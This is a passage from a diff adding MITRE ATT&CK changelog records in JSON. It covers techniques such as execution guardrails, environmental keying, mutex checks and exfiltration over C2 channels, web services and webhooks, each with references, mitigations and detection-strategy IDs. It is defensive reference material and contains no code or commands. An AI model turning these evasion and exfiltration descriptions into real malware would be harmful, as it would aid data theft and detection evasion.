Trellix-Qakbot)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1480",
+                            "external_id": "T1480"
+                        },
+                        {
+                            "source_name": "FireEye Outlook Dec 2019",
+                            "description": "McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved June 23, 2020.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html"
+                        },
+                        {
+                            "source_name": "Trellix-Qakbot",
+                            "description": "Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware Distribution. Retrieved June 7, 2024.",
+                            "url": "https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/"
+                        },
+                        {
+                            "source_name": "FireEye Kevin Mandia Guardrails",
+                            "description": "Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says U.S. malware is more restrained than adversaries'. Retrieved January 17, 2019.",
+                            "url": "https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Nick Carr, Mandiant"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.685000+00:00\", \"old_value\": \"2026-04-15 20:03:40.312000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1055: Do Not Mitigate"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0562: Multi-Platform Execution Guardrails Environmental Validation Detection Strategy"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-06-23 22:28:28.041000+00:00",
+                    "modified": "2026-05-12 15:12:00.724000+00:00",
+                    "name": "Environmental Keying",
+                    "description": "Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents)\n\nValues can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).\n\nSimilar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.\n\nLike other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1480/001",
+                            "external_id": "T1480.001"
+                        },
+                        {
+                            "source_name": "Proofpoint Router Malvertising",
+                            "description": "Kafeine. (2016, December 13). Home Routers Under Attack via Malvertising on Windows, Android Devices. Retrieved January 16, 2019.",
+                            "url": "https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices"
+                        },
+                        {
+                            "source_name": "Kaspersky Gauss Whitepaper",
+                            "description": "Kaspersky Lab. (2012, August). Gauss: Abnormal Distribution. Retrieved January 17, 2019.",
+                            "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134940/kaspersky-lab-gauss.pdf"
+                        },
+                        {
+                            "source_name": "EK Clueless Agents",
+                            "description": "Riordan, J., Schneier, B. (1998, June 18). Environmental Key Generation towards Clueless Agents. Retrieved January 18, 2019.",
+                            "url": "https://www.schneier.com/academic/paperfiles/paper-clueless-agents.pdf"
+                        },
+                        {
+                            "source_name": "EK Impeding Malware Analysis",
+                            "description": "Song, C., et al. (2012, August 7). Impeding Automated Malware Analysis with Environment-sensitive Malware. Retrieved January 18, 2019.",
+                            "url": "https://pdfs.semanticscholar.org/2721/3d206bc3c1e8c229fb4820b6af09e7f975da.pdf"
+                        },
+                        {
+                            "source_name": "Demiguise Guardrail Router Logo",
+                            "description": "Warren, R. (2017, August 2). Demiguise: virginkey.js. Retrieved January 17, 2019.",
+                            "url": "https://github.com/nccgroup/demiguise/blob/master/examples/virginkey.js"
+                        },
+                        {
+                            "source_name": "Environmental Keyed HTA",
+                            "description": "Warren, R. (2017, August 8). Smuggling HTA files in Internet Explorer/Edge. Retrieved November 17, 2024.",
+                            "url": "http://web.archive.org/web/20200608093807/https://www.nccgroup.com/uk/about-us/newsroom-and-events/blogs/2017/august/smuggling-hta-files-in-internet-exploreredge/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Nick Carr, Mandiant"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "Windows",
+                        "macOS"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.724000+00:00\", \"old_value\": \"2026-04-15 20:07:10.470000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1055: Do Not Mitigate"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0474: Environmental Keying Discovery-to-Decryption Behavioral Chain Detection Strategy"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--49fca0d2-685d-41eb-8bd4-05451cc3a742",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2024-09-19 14:00:03.401000+00:00",
+                    "modified": "2026-05-12 15:12:00.630000+00:00",
+                    "name": "Mutual Exclusion",
+                    "description": "Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)\n\nWhile local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012)\n\nIn Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023)\n\nMutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1480/002",
+                            "external_id": "T1480.002"
+                        },
+                        {
+                            "source_name": "Intezer RedXOR 2021",
+                            "description": "Joakim Kennedy and Avigayil Mechtinger. (2021, March 10). New Linux Backdoor RedXOR Likely Operated by Chinese Nation-State Actor. Retrieved September 19, 2024.",
+                            "url": "https://intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/"
+                        },
+                        {
+                            "source_name": "Sans Mutexes 2012",
+                            "description": "Lenny Zeltser. (2012, July 24). Looking at Mutex Objects for Malware Discovery & Indicators of Compromise. Retrieved September 19, 2024.",
+                            "url": "https://www.sans.org/blog/looking-at-mutex-objects-for-malware-discovery-indicators-of-compromise/"
+                        },
+                        {
+                            "source_name": "ICS Mutexes 2015",
+                            "description": "Lenny Zeltser. (2015, March 9). How Malware Generates Mutex Names to Evade Detection. Retrieved September 19, 2024.",
+                            "url": "https://isc.sans.edu/diary/How+Malware+Generates+Mutex+Names+to+Evade+Detection/19429/"
+                        },
+                        {
+                            "source_name": "Microsoft Mutexes",
+                            "description": "Microsoft. (2022, March 11). Mutexes. Retrieved September 19, 2024.",
+                            "url": "https://learn.microsoft.com/en-us/dotnet/standard/threading/mutexes"
+                        },
+                        {
+                            "source_name": "Deep Instinct BPFDoor 2023",
+                            "description": "Shaul Vilkomir-Preisman and Eliran Nissan. (2023, May 10). BPFDoor Malware Evolves \u2013 Stealthy Sniffing Backdoor Ups Its Game. Retrieved September 19, 2024.",
+                            "url": "https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Manikantan Srinivasan, NEC Corporation India",
+                        "Pooja Natarajan, NEC Corporation India",
+                        "Nagahama Hiroki \u2013 NEC Corporation Japan"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.630000+00:00\", \"old_value\": \"2026-04-15 20:07:21.724000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1055: Do Not Mitigate"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0132: Detection of Mutex-Based Execution Guardrails Across Platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--8e350c1d-ac79-4b5c-bd4e-7476d7e84ec5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-15 15:34:30.767000+00:00",
+                    "modified": "2026-05-12 15:12:00.705000+00:00",
+                    "name": "Exfiltration Over Asymmetric Encrypted Non-C2 Protocol",
+                    "description": "Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAsymmetric encryption algorithms are those that use different keys on each end of the channel. Also known as public-key cryptography, this requires pairs of cryptographic keys that can encrypt/decrypt data from the corresponding key. Each end of the communication channels requires a private key (only in the procession of that entity) and the public key of the other entity. The public keys of each entity are exchanged before encrypted communications begin. \n\nNetwork protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize symmetric encryption once keys are exchanged. Adversaries may opt to use these encrypted mechanisms that are baked into a protocol. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "exfiltration"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1048/002",
+                            "external_id": "T1048.002"
+                        },
+                        {
+                            "source_name": "University of Birmingham C2",
+                            "description": "Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.",
+                            "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "William Cain"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.705000+00:00\", \"old_value\": \"2025-10-24 17:49:05.552000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1030: Network Segmentation",
+                            "M1031: Network Intrusion Prevention",
+                            "M1037: Filter Network Traffic",
+                            "M1057: Data Loss Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0512: Detection of Exfiltration Over Asymmetric Encrypted Non-C2 Protocol"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-15 15:37:47.583000+00:00",
+                    "modified": "2026-05-12 15:12:00.726000+00:00",
+                    "name": "Exfiltration Over Unencrypted Non-C2 Protocol",
+                    "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.(Citation: copy_cmd_cisco)\n\nAdversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "exfiltration"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1048/003",
+                            "external_id": "T1048.003"
+                        },
+                        {
+                            "source_name": "copy_cmd_cisco",
+                            "description": "Cisco. (2022, August 16). copy - Cisco IOS Configuration Fundamentals Command Reference . Retrieved July 13, 2022.",
+                            "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/C_commands.html#wp1068167689"
+                        },
+                        {
+                            "source_name": "University of Birmingham C2",
+                            "description": "Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.",
+                            "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "William Cain",
+                        "Austin Clark, @c2defense"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.726000+00:00\", \"old_value\": \"2025-10-24 17:49:39.079000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "2.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1030: Network Segmentation",
+                            "M1031: Network Intrusion Prevention",
+                            "M1037: Filter Network Traffic",
+                            "M1057: Data Loss Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0149: Detection of Exfiltration Over Unencrypted Non-C2 Protocol"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:30:41.804000+00:00",
+                    "modified": "2026-05-12 15:12:00.706000+00:00",
+                    "name": "Exfiltration Over C2 Channel",
+                    "description": "Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "exfiltration"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1041",
+                            "external_id": "T1041"
+                        },
+                        {
+                            "source_name": "University of Birmingham C2",
+                            "description": "Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.",
+                            "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "William Cain"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.706000+00:00\", \"old_value\": \"2025-10-24 17:49:06.675000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "2.3",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1031: Network Intrusion Prevention",
+                            "M1057: Data Loss Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0348: Detection Strategy for Exfiltration Over C2 Channel"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--40597f16-0963-4249-bf4c-ac93b7fb9807",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-09 12:51:45.570000+00:00",
+                    "modified": "2026-05-12 15:12:00.628000+00:00",
+                    "name": "Exfiltration Over Web Service",
+                    "description": "Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.\n\nWeb service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "exfiltration"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1567",
+                            "external_id": "T1567"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "William Cain"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Office Suite",
+                        "SaaS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.5",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.628000+00:00\", \"old_value\": \"2025-10-24 17:48:42.061000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.5",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1021: Restrict Web-Based Content",
+                            "M1057: Data Loss Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0548: Detection Strategy for Exfiltration Over Web Service"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--43f2776f-b4bd-4118-94b8-fee47e69676d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-07-20 15:30:55.763000+00:00",
+                    "modified": "2026-05-12 15:12:00.629000+00:00",
+                    "name": "Exfiltration Over Webhook",
+                    "description": "Adversaries may exfiltrate data to a webhook endpoint rather than over their primary command and control channel. Webhooks are simple mechanisms for allowing a server to push data over HTTP/S to a client without the need for the client to continuously poll the server.(Citation: RedHat Webhooks) Many public and commercial services, such as Discord, Slack, and `webhook.site`, support the creation of webhook endpoints that can be used by other services, such as Github, Jira, or Trello.(Citation: Discord Intro to Webhooks) When changes happen in the linked services (such as pushing a repository update or modifying a ticket), these services will automatically post the data to the webhook endpoint for use by the consuming application. \n\nAdversaries may link an adversary-owned environment to a victim-owned SaaS service to achieve repeated [Automated Exfiltration](https://attack.mitre.org/techniques/T1020) of emails, chat messages, and other data.(Citation: Push Security SaaS Attacks Repository Webhooks) Alternatively, instead of linking the webhook endpoint to a service, an adversary can manually post staged data directly to the URL in order to exfiltrate it.(Citation: Microsoft SQL Server)\n\nAccess to webhook endpoints is often over HTTPS, which gives the adversary an additional level of protection. Exfiltration leveraging webhooks can also blend in with normal network traffic if the webhook endpoint points to a commonly used SaaS application or collaboration service.(Citation: CyberArk Labs Discord)(Citation: Talos Discord Webhook Abuse)(Citation: Checkmarx Webhooks)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "exfiltration"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1567/004",
+                            "external_id": "T1567.004"
+                        },
+                        {
+                            "source_name": "Checkmarx Webhooks",
+                            "description": " Jossef Harush Kadouri. (2022, March 7). Webhook Party \u2014 Malicious packages caught exfiltrating data via legit webhook services. Retrieved July 20, 2023.",
+                            "url": "https://medium.com/checkmarx-security/webhook-party-malicious-packages-caught-exfiltrating-data-via-legit-webhook-services-6e046b07d191"
+                        },
+                        {
+                            "source_name": "CyberArk Labs Discord",
+                            "description": "CyberArk Labs. (2023, April 13). The (Not so) Secret War on Discord. Retrieved July 20, 2023.",
+                            "url": "https://www.cyberark.com/resources/threat-research-blog/the-not-so-secret-war-on-discord"
+                        },
+                        {
+                            "source_name": "Discord Intro to Webhooks",
+                            "description": "D. (n.d.). Intro to Webhooks. Retrieved July 20, 2023.",
+                            "url": "https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks"
+                        },
+                        {
+                            "source_name": "Microsoft SQL Server",
+                            "description": "Microsoft Threat Intelligence. (2023, October 3). Defending new vectors: Threat actors attempt SQL Server to cloud lateral movement. Retrieved October 3, 2023.",
+                            "url": "https://www.microsoft.com/security/blog/2023/10/03/defending-new-vectors-threat-actors-attempt-sql-server-to-cloud-lateral-movement/"
+                        },
+                        {
+                            "source_name": "Talos Discord Webhook Abuse",
+                            "description": "Nick Biasini, Edmund Brumaghin, Chris Neal, and Paul Eubanks. (2021, April 7). https://blog.talosintelligence.com/collab-app-abuse/. Retrieved July 20, 2023.",
+                            "url": "https://blog.talosintelligence.com/collab-app-abuse/"
+                        },
+                        {
+                            "source_name": "Push Security SaaS Attacks Repository Webhooks",
+                            "description": "Push Security. (2023, July 31). Webhooks. Retrieved August 4, 2023.",
+                            "url": "https://github.com/pushsecurity/saas-attacks/blob/main/techniques/webhooks/description.md"
+                        },
+                        {
+                            "source_name": "RedHat Webhooks",
+                            "description": "RedHat. (2022, June 1). What is a webhook?. Retrieved July 20, 2023.",
+                            "url": "https://www.redhat.com/en/topics/automation/what-is-a-webhook"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Yossi Weizman, Microsoft Threat Intelligence",
+                        "Sunders Bruskin, Microsoft Threat Intelligence"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Office Suite",
+                        "SaaS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.629000+00:00\", \"old_value\": \"2025-04-15 19:58:26.901000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1057: Data Loss Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
